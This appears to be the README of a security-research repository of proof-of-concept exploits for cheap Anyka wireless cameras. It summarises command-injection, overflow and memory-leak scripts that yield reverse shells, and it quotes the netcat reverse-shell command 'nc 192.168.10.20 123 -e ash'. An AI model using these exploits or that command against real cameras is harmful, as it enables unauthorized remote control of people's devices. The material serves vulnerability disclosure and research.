This is a repository containing proof-of-concept exploits for getting a remote reverse shell while the Anyka camera is hosting hotspot (cheap Aliexpress camera's mostly). Also contains scripts for interacting with various open ports on the device.
Analysing a Wireless Network Camera [1]: Teardown and Access Point Bugs
Analysing a Wireless Network Camera [2]: Popping Shells
These exploits/PoCs concern the daemon process running on the camera.
This script will exploit a command injection on port 6789 hosted by the daemon process, it will execute the command nc 192.168.10.20 123 -e ash
to set up a reverse shell for some other device listening on the network with IP 192.168.10.20 listening on port 123.
This script uses a global overflow in port 6789 handler in daemon and requests to port 8192 to leak a pointer, then exploits a stack overflow to establish a reverse shell for some other device listening on the network with IP 192.168.10.20 listening on port 123.
This script uses the exposed FTP server to leak the /proc/425/maps
file to get libc base address in daemon process then exploits a stack overflow to establish a reverse shell for some other device listening on the network with IP 192.168.10.20 listening on port 123
This script simply requests to port 8192 to get some information about the camera.
These exploits/PoCs concern the anyka_ipc process running on the camera, this process links a shared library called libcloudapi that exposes port 6000.
This script can be used to send credentials to the camera, and it will then attempt to bind to the specified AP.
This script returns the length of a log file, note that the desired log directory is not created by default, so it will cause the anyka_ipc process to crash.
This script returns some camera details.
This script exploits a command injection in the libcloudapi hosted port 6000 to establish a reverse shell for some other device listening on the network with IP 192.168.10.20 listening on port 123.
This script allows the file with the passed filename to be written onto the device in the /tmp
directory.